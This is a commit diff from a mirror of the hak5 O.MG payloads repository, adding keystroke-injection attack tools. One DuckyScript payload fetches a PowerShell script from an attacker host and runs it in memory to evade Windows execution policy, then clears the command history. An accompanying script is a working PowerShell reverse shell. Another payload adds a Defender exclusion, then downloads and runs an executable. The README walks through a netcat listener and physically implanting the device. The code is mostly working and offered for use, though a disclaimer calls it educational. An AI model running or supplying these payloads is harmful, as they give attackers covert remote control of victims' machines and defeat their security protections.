mirror of https://github.com/hak5/omg-payloads.git
Compare commits
13 Commits
1aed0ae89b
...
cbf5391081
| Author | SHA1 | Date |
|---|---|---|
Tyler
|
cbf5391081 | |
Kalani Helekunihi
|
483c8e239f | |
salt-or-ester
|
c67545fc0a | |
|
salt-or-ester
|
8d8fb3fddc | |
|
salt-or-ester
|
6c901c2648 | |
|
salt-or-ester
|
6ca75bf3a8 | |
|
salt-or-ester
|
937f1c46ae | |
|
salt-or-ester
|
52e0b4fa1b | |
|
salt-or-ester
|
7428e92010 | |
|
salt-or-ester
|
f5ae0446db | |
|
salt-or-ester
|
a8ad722e5c | |
|
salt-or-ester
|
dd72e4b9cc | |
|
Tyler
|
c1882928ee |
|
|
@ -0,0 +1,64 @@
|
|||
# The Bypass Buddy: Bypass Script Execution Policies
|
||||
|
||||
Running user (target) does **not** need to have admin rights. Bypass Buddy has only been tested on the [O.MG Plug Elite](https://hak5.org/products/omg-plug), Windows 11. It likely works on other [hak5 devices](https://hak5.org/products/) and Windows distributions -- the payload is written in standard DuckyScript™.
|
||||
|
||||
## Overview
|
||||
|
||||
### Target Has a Strict "Script Execution Policy"? Evade it and Run Whatever Script You Please!
|
||||
|
||||
In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights.
|
||||
|
||||
<p align="center">
|
||||
<img src="img/evasion.png" alt="evasion" height="75%" width="75%"/>
|
||||
</p>
|
||||
|
||||
## How It Works
|
||||
|
||||
To avoid Windows Script Execution policies:
|
||||
1. **Upload** your .ps1 script to any webserver.
|
||||
2. **Download** the Powershel script to memory on the target host.
|
||||
3. **Execute** the Powershell script in RAM dynamically on your target host.
|
||||
*Note: Nothing is ever written to disk.*
|
||||
|
||||
## Steps to Execute a Restricted Powershell Payload
|
||||
|
||||
1. **Prepare Your Powershell Script (.ps1)**
|
||||
- Create your Powershell script. The example `reverse-shell.ps1` creates a reverse shell on the target host. You can create any Powerscript payload you please.
|
||||
|
||||
2. **Upload Your Powershell Payload**
|
||||
- Upload your .ps1 script to the serving-directory of your (attacking) webserver.
|
||||
|
||||
3. **Set Up Your Listener**
|
||||
- Open a listener on your receiving (attacking) host using Netcat or any listener you please:
|
||||
```bash
|
||||
nc -v -p 4111
|
||||
```
|
||||
|
||||
4. **Prepare Your DuckyScript™ Payload**
|
||||
- Add `payload.txt` to the 'boot' slot of your O.MG Plug.
|
||||
|
||||
5. **Deploy the O.MG Plug**
|
||||
- Implant your O.MG Plug into the target host.
|
||||
|
||||
6. **Wait for Connection**
|
||||
- Wait for the target host to connect to your listener.
|
||||
|
||||
7. **Verify the Connection**
|
||||
- Type `whoami` into the reverse shell and hit enter.
|
||||
|
||||
8. **Success!**
|
||||
- You did it!
|
||||
<p></p>
|
||||
<p align="center">
|
||||
<img src="img/reverse-shell.png" alt="reverse-shell" height="50%" width="50%"/>
|
||||
</p>
|
||||
|
||||
## Notes
|
||||
|
||||
- **Ensure** to modify both `reverse-shell.ps1` and `payload.txt` with your specific configurations, including the IP address and port of your sending/receiving hosts, if you choose to use `reverse-shell.ps1` as your payload.
|
||||
- In cases where you'd like to create your own .ps1 payload, modify just `payload.txt` with your webserver's host/IP and script name.
|
||||
- This method is a **proof-of-concept** and should be tested responsibly and legally.
|
||||
|
||||
---
|
||||
|
||||
*Remember, the purpose of this proof-of-concept is educational and for understanding how RAM injection/execution can be used to bypass certain security measures. Always use these techniques ethically and within the bounds of the law.*
|
||||
|
|
@ -0,0 +1,9 @@
|
|||
▀█████████▄ ▄██ ▄ ▄███████▄ ▄████████ ▄████████ ▄████████ ▀█████████▄ ███ █▄ ████████▄ ████████▄ ▄██ ▄
|
||||
███ ███ ███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▀███ ███ ▀███ ███ ██▄
|
||||
███ ███ ███▄▄▄███ ███ ███ ███ ███ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ ███ ███▄▄▄███
|
||||
▄███▄▄▄██▀ ▀▀▀▀▀▀███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄██▀ ███ ███ ███ ███ ███ ███ ▀▀▀▀▀▀███
|
||||
▀▀███▀▀▀██▄ ▄██ ███ ▀█████████▀ ▀███████████ ▀███████████ ▀███████████ ▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███ ▄██ ███
|
||||
███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███ ██▄ ███ ███ ███ ███ ███ ███ ███ ███
|
||||
███ ███ ███ ███ ███ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ███ ███ ███ ▄███ ███ ▄███ ███ ███
|
||||
▄█████████▀ ▀█████▀ ▄████▀ ███ █▀ ▄████████▀ ▄████████▀ ▄█████████▀ ████████▀ ████████▀ ████████▀ ▀█████▀
|
||||
|
||||
Binary file not shown.
|
After Width: | Height: | Size: 24 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 169 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 127 KiB |
|
|
@ -0,0 +1 @@
|
|||
In this DuckyScript™, we explore a method to evade Windows 11's Script Execution Policy protections. The approach involves downloading a script to RAM, then executing it in RAM on-the-fly. This can be accomplished **without** administrative rights.
|
||||
|
|
@ -0,0 +1,41 @@
|
|||
REM_BLOCK
|
||||
Title: The Bypass Buddy
|
||||
Author: salt-or-ester | salt-or-ester@protonmail.com | https://gitgud.io/saltorester
|
||||
Description: Evade Windows Script Execution Policy
|
||||
Target: Windows 11
|
||||
Device: O.MG Plug | https://hak5.org/products/omg-plug
|
||||
Version: 1.1
|
||||
Category: Execution
|
||||
|
||||
Tested on: O.MG Plug Elite, Windows 11
|
||||
Will likely work on other devices and Windows flavors
|
||||
|
||||
The Bypass Buddy implements a method to evade Windows script execution
|
||||
policy protections.
|
||||
|
||||
The approach involves downloading a Powershell script into memory (not disk),
|
||||
and running it on-the-fly.
|
||||
|
||||
This can be accomplished without administrative rights.
|
||||
END_REM
|
||||
|
||||
REM Formatting is not indented to comply with O.MG Editor/UI
|
||||
FUNCTION EVADE_SCRIPT_EXECUTION_POLICY()
|
||||
REM Normally I would add this below the header, as it's a constant, but moving it here for portability
|
||||
REM Payload to download and run in memory
|
||||
DEFINE #PAYLOAD_URL "http://10.10.10.10/payload.ps1"
|
||||
GUI r
|
||||
REM Let GUI load
|
||||
DELAY 2000
|
||||
STRINGLN powershell
|
||||
REM Let Powershell window open
|
||||
DELAY 1000
|
||||
STRINGLN Start-Job -ScriptBlock { try { $response = Invoke-WebRequest -Uri #PAYLOAD_URL -ErrorAction Stop; $scriptContent = [System.Text.Encoding]::UTF8.GetString($response.Content); cd ~; Invoke-Expression $scriptContent } catch { Write-Error "Failed to download or execute script: $_" } }
|
||||
STRINGLN Clear-History
|
||||
STRINGLN clear
|
||||
GUI DOWNARROW
|
||||
END_FUNCTION
|
||||
|
||||
REM Wait for device to be "ready"
|
||||
DELAY 3000
|
||||
EVADE_SCRIPT_EXECUTION_POLICY()
|
||||
|
|
@ -0,0 +1,42 @@
|
|||
# Create a TCP client and connect to the specified address and port
|
||||
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 4111)
|
||||
$stream = $client.GetStream()
|
||||
$writer = New-Object System.IO.StreamWriter($stream)
|
||||
$reader = New-Object System.IO.StreamReader($stream)
|
||||
$writer.AutoFlush = $true
|
||||
|
||||
# Continuously listen for commands and execute them
|
||||
while ($true) {
|
||||
try {
|
||||
# Read command from the listener
|
||||
$command = $reader.ReadLine()
|
||||
|
||||
# Check if the command is null or empty and continue to next iteration
|
||||
if ([string]::IsNullOrWhiteSpace($command)) {
|
||||
continue
|
||||
}
|
||||
|
||||
# Execute the command and capture the output
|
||||
$output = Invoke-Expression $command 2>&1 | Out-String
|
||||
|
||||
# Send the output back to the listener
|
||||
$writer.WriteLine($output)
|
||||
}
|
||||
catch {
|
||||
# Handle any errors that occur during command execution
|
||||
$errorMessage = $_.Exception.Message
|
||||
$writer.WriteLine("Error: $errorMessage")
|
||||
}
|
||||
finally {
|
||||
# Check if the stream is still open, if not, re-establish the connection
|
||||
if (-not $client.Connected) {
|
||||
$client.Close()
|
||||
Start-Sleep -Seconds 5 # Sleep before trying to reconnect
|
||||
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10', 4111)
|
||||
$stream = $client.GetStream()
|
||||
$writer = New-Object System.IO.StreamWriter($stream)
|
||||
$reader = New-Object System.IO.StreamReader($stream)
|
||||
$writer.AutoFlush = $true
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -0,0 +1,38 @@
|
|||
DUCKY_LANG US
|
||||
DELAY 2000
|
||||
GUI r
|
||||
STRING cmd
|
||||
DELAY 300
|
||||
CTRL+SHIFT ENTER
|
||||
DELAY 300
|
||||
TAB
|
||||
DELAY 200
|
||||
TAB
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING powershell
|
||||
DELAY 500
|
||||
ENTER
|
||||
STRING mkdir C:\<created folder of your choice> ### change me ###
|
||||
DELAY 100
|
||||
ENTER
|
||||
STRING Add-MpPreference -ExclusionPath 'C:\folder of your choice' ### change me ###
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING curl http://<---IP---->:<PORT>/payload.exe -o C:\folder_of_choice\created_payload.exe ### change me ###
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING cd C:\<created folder>
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING .\payload.exe ### change to desired, compiled payload ###
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 100
|
||||
STRING exit
|
||||
DELAY 100
|
||||
ENTER
|
||||
Loading…
Reference in New Issue